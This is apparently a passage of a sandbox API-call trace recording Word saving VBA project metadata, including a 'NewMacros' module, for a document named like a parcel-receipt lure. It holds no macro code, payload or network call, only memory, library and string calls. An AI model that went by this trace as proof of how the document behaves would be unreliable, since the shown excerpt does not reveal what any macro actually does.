lpMultiByteStr=0x778b818, cbMultiByte=8, lpWideCharStr=0x778b728, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0236.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x281756, cbMultiByte=2039, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0236.143] lstrlenA (lpString="Project") returned 7 [0236.143] lstrcatA (in: lpString1="Project", lpString2="\"\r\n" | out: lpString1="Project\"\r\n") returned="Project\"\r\n" [0236.143] lstrlenA (lpString="Name=\"Project\"\r\n") returned 16 [0236.143] wsprintfA (in: param_1=0x281750, param_2="%s=\"%d\"\r\n" | out: param_1="HelpContextID=\"0\"\r\n") returned 19 [0236.143] lstrlenA (lpString="HelpContextID=\"0\"\r\n") returned 19 [0236.143] wsprintfA (in: param_1=0x281750, param_2="%s=\"%u\"\r\n" | out: param_1="VersionCompatible32=\"393222000\"\r\n") returned 33 [0236.143] lstrlenA (lpString="VersionCompatible32=\"393222000\"\r\n") returned 33 [0236.143] wsprintfA (in: param_1=0x280e90, param_2="%s=\"" | out: param_1="CMG=\"") returned 5 [0236.143] GetTickCount () returned 0x483de [0236.143] lstrlenA (lpString="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned 38 [0236.143] GetTickCount () returned 0x483de [0236.143] GetTickCount () returned 0x483de [0236.143] GetTickCount () returned 0x483de [0236.143] lstrcatA (in: lpString1="CMG=\"", lpString2="5E5C5E02E23E4442444244424442" | out: lpString1="CMG=\"5E5C5E02E23E4442444244424442") returned="CMG=\"5E5C5E02E23E4442444244424442" [0236.143] lstrcatA (in: lpString1="CMG=\"5E5C5E02E23E4442444244424442", lpString2="\"\r\n" | out: lpString1="CMG=\"5E5C5E02E23E4442444244424442\"\r\n") returned="CMG=\"5E5C5E02E23E4442444244424442\"\r\n" [0236.143] lstrlenA (lpString="CMG=\"5E5C5E02E23E4442444244424442\"\r\n") returned 36 [0236.143] wsprintfA (in: param_1=0x280e90, param_2="%s=\"" | out: param_1="DPB=\"") returned 5 [0236.143] lstrlenA (lpString="") returned 0 [0236.143] GetTickCount () returned 0x483de [0236.143] lstrlenA (lpString="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned 38 [0236.143] GetTickCount () returned 0x483de [0236.144] GetTickCount () returned 0x483de [0236.144] lstrcatA (in: lpString1="DPB=\"", lpString2="BCBEBCE0443F453F453F" | out: lpString1="DPB=\"BCBEBCE0443F453F453F") returned="DPB=\"BCBEBCE0443F453F453F" [0236.144] lstrcatA (in: lpString1="DPB=\"BCBEBCE0443F453F453F", lpString2="\"\r\n" | out: lpString1="DPB=\"BCBEBCE0443F453F453F\"\r\n") returned="DPB=\"BCBEBCE0443F453F453F\"\r\n" [0236.144] lstrlenA (lpString="DPB=\"BCBEBCE0443F453F453F\"\r\n") returned 28 [0236.144] wsprintfA (in: param_1=0x280e90, param_2="%s=\"" | out: param_1="GC=\"") returned 4 [0236.144] GetTickCount () returned 0x483de [0236.144] lstrlenA (lpString="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned 38 [0236.144] GetTickCount () returned 0x483de [0236.144] lstrcatA (in: lpString1="GC=\"", lpString2="1A181A467947794786" | out: lpString1="GC=\"1A181A467947794786") returned="GC=\"1A181A467947794786" [0236.144] lstrcatA (in: lpString1="GC=\"1A181A467947794786", lpString2="\"\r\n" | out: lpString1="GC=\"1A181A467947794786\"\r\n") returned="GC=\"1A181A467947794786\"\r\n" [0236.144] lstrlenA (lpString="GC=\"1A181A467947794786\"\r\n") returned 25 [0236.144] wsprintfA (in: param_1=0x281580, param_2="\r\n[%s]\r\n" | out: param_1="\r\n[Host Extender Info]\r\n") returned 24 [0236.144] lstrlenA (lpString="\r\n[Host Extender Info]\r\n") returned 24 [0236.144] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0236.144] wsprintfA (in: param_1=0xa39c600, param_2="%s=%s\r\n" | out: param_1="&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000\r\n") returned 66 [0236.144] lstrlenA (lpString="&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000\r\n") returned 66 [0236.144] wsprintfA (in: param_1=0x281580, param_2="\r\n[%s]\r\n" | out: param_1="\r\n[Workspace]\r\n") returned 15 [0236.144] lstrlenA (lpString="\r\n[Workspace]\r\n") returned 15 [0236.144] lstrlenA (lpString="0, 0, 0, 0, C") returned 13 [0236.144] wsprintfA (in: param_1=0xa39c600, param_2="%s=%s\r\n" | out: param_1="ThisDocument=0, 0, 0, 0, C\r\n") returned 28 [0236.144] lstrlenA (lpString="ThisDocument=0, 0, 0, 0, C\r\n") returned 28 [0236.144] lstrlenA (lpString="52, 52, 1640, 737, Z") returned 20 [0236.144] wsprintfA (in: param_1=0xa39c600, param_2="%s=%s\r\n" | out: param_1="NewMacros=52, 52, 1640, 737, Z\r\n") returned 32 [0236.144] lstrlenA (lpString="NewMacros=52, 52, 1640, 737, Z\r\n") returned 32 [0236.144] CExposedStream::Commit () returned 0x0 [0236.145] CExposedStream::Release () returned 0x0 [0236.145] CExposedDocFile::Release () returned 0x1 [0236.205] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.205] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=8, lpWideCharStr=0x778b728, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0236.205] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.205] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=8, lpWideCharStr=0x778b7b8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0236.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x281d40, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0236.205] lstrlenA (lpString="Project") returned 7 [0236.205] _wfullpath (in: _Buffer=0x281e40, _Path="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" [0236.205] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", lpString2="C:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0236.219] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.219] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=8, lpWideCharStr=0x778b7b8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0236.219] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.219] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=8, lpWideCharStr=0x778b728, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0236.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x282c80, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0236.219] lstrlenA (lpString="Project") returned 7 [0236.221] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.221] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x778b728, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.280] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.280] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.280] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.280] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.280] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.280] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.280] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.280] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.280] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x258) returned 0x7fef0d9c6fc [0236.281] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.281] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.281] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.281] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x253) returned 0x7fef0f94a40 [0236.281] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.281] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.281] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.282] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x278) returned 0x7fef0ddfe60 [0236.282] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.282] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.282] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.282] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x204) returned 0x7fef0de17b0 [0236.282] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.282] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.282] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.282] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x260) returned 0x7fef0de142c [0236.283] CExposedDocFile::Release () returned 0x3 [0236.283] CExposedDocFile::Release () returned 0x2 [0236.283] CExposedDocFile::Release () returned 0x1 [0236.283] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.283] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.283] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.283] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.283] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.283] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.283] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.283] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.283] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x258) returned 0x7fef0d9c6fc [0236.283] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.283] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.283] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.284] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x253) returned 0x7fef0f94a40 [0236.284] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.284] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.284] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.284] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x278) returned 0x7fef0ddfe60 [0236.284] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.284] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.284] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.285] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x204) returned 0x7fef0de17b0 [0236.285] SetErrorMode (uMode=0x8001) returned 0x8005 [0236.285] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0236.285] SetErrorMode (uMode=0x8005) returned 0x8005 [0236.285] GetProcAddress (hModule=0x7fef0ca0000, lpProcName=0x260) returned 0x7fef0de142c [0236.285] IMalloc:Free (This=0x7fefe9e5380, pv=0x7818720) [0236.287] SetCursor (hCursor=0x10007) returned 0x10003 [0236.287] CExposedDocFile::Release () returned 0x1 [0236.287] CExposedDocFile::Release () returned 0x0 [0236.287] CExposedDocFile::Release () returned 0x0 [0236.287] IMalloc:Free (This=0x7fefe9e5380, pv=0x79b15b0) [0236.287] IMalloc:Free (This=0x7fefe9e5380, pv=0x7818560) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x77ddf50) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x78184e0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7818120) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x78185e0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a5dbf0) [0236.288] RtlLookupFunctionEntry (in: ControlPc=0x79e23b4, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0x0 [0236.288] RtlLookupFunctionEntry (in: ControlPc=0x79e246c, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0x0 [0236.288] RtlLookupFunctionEntry (in: ControlPc=0xbcbc524, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0x0 [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7935580) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a1960) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a1db0) [0236.288] RtlLookupFunctionEntry (in: ControlPc=0xbcbccbc, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0xbcbcd0c [0236.288] RtlLookupFunctionEntry (in: ControlPc=0xbcbce28, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0xbcbce98 [0236.288] RtlLookupFunctionEntry (in: ControlPc=0xbcbd134, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0xbcbd184 [0236.288] RtlLookupFunctionEntry (in: ControlPc=0xbcbcf10, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0xbcbcf70 [0236.288] RtlLookupFunctionEntry (in: ControlPc=0xbcbd074, ImageBase=0x289850, HistoryTable=0x289870 | out: ImageBase=0x289850, HistoryTable=0x289870) returned 0xbcbd0bc [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4fec0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a2650) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a2200) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a2ef0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a2aa0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a75fd0) [0236.288] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.288] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.288] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.288] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.288] FreeLibrary (hLibModule=0x7fef0ca0000) returned 1 [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bfc0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7832340) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x78dec60) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a64e10) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x76f11e0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd57e90) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x778b8d0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5490) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a24b0) [0236.288] IMalloc:Free (This=0x7fefe9e5380, pv=0x7921860) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x7724000) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x778ba20) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x778b8a0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5850) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cf20) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cdc0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x797bb00) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x7935610) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bc30) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79217f0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79d7cd0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f41d0) [0236.289] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784eb50 [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f090) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x784e090) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x778c0e0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79227b0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd37e30) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x784e0e0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79782c0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x784e180) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x784eb50) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x790db80) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a786c0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5010) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f50d0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0x7934ad0) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4b810) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4e700) [0236.289] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4ab30) [0236.289] VirtualFree (lpAddress=0x6960000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.290] VirtualFree (lpAddress=0x69f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.290] VirtualFree (lpAddress=0x6a00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.290] VirtualFree (lpAddress=0x6b90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.291] VirtualFree (lpAddress=0x6ba0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x78f7a10) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x784df60) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x74cc2c0) [0236.291] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784df60 [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f080) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x784e900) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x778b9f0) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4b1c0) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x784dfe0) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x7978540) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x784e750) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x784df60) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x790dc70) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4a750) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x797a500) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5190) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5250) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x7934d10) [0236.291] IMalloc:Free (This=0x7fefe9e5380, pv=0x79784c0) [0236.292] wcsncpy_s (in: _Destination=0x289760, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0236.292] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0236.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x289690, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0236.292] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0236.292] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790dc70 [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f2c0) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x778b960) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x778b870) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd49970) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bd20) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cf00) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x79353d0) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x790dc70) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f2a0) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd48480) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5550) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x7977340) [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x7977480) [0236.292] VirtualFree (lpAddress=0x5030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.292] IMalloc:Free (This=0x7fefe9e5380, pv=0x781b260) [0236.292] VirtualFree (lpAddress=0x5360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.293] VirtualFree (lpAddress=0x4e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a5e820) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0xc2d8060) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0xbccc610) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0x7978240) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a58d50) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0x76d35a0) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a67b30) [0236.293] IMalloc:Free (This=0x7fefe9e5380, pv=0x77ebb20) [0236.294] GetCurrentThreadId () returned 0x958 [0236.295] IMalloc:Free (This=0x7fefe9e5380, pv=0x7921780) [0236.295] IMalloc:Free (This=0x7fefe9e5380, pv=0x78185a0) [0236.295] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a64d60) [0236.295] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a64cb0) [0236.341] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.341] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x778b728, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.778] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b728, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.778] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b728, cbMultiByte=7, lpWideCharStr=0x778b818, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.782] CExposedDocFile::Release () returned 0x2 [0236.782] CExposedDocFile::Release () returned 0x1 [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x7818460) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x79216a0) [0236.782] SetCursor (hCursor=0x10007) returned 0x10007 [0236.782] CExposedDocFile::Release () returned 0x0 [0236.782] CExposedDocFile::Release () returned 0x0 [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x793a5f0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x72a1510) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50bb0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd51450) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd51000) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd518a0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a77dd0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x778be40) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bea0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x77f5d10) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x797e940) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd7ff30) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0c3e0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd962a0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x797e920) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd96360) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x797e900) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbdd6350) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x79d7fd0) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f5310) [0236.782] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x759bff0 [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f210) [0236.782] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bcc0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x778be10) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x7921940) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd4f320) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cea0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x778be70) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x79785e0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x79352b0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x759bff0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f0a0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x7957ef0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bba0) [0236.783] IMalloc:Free (This=0x7fefe9e5380, pv=0x778bb40) [0236.783] 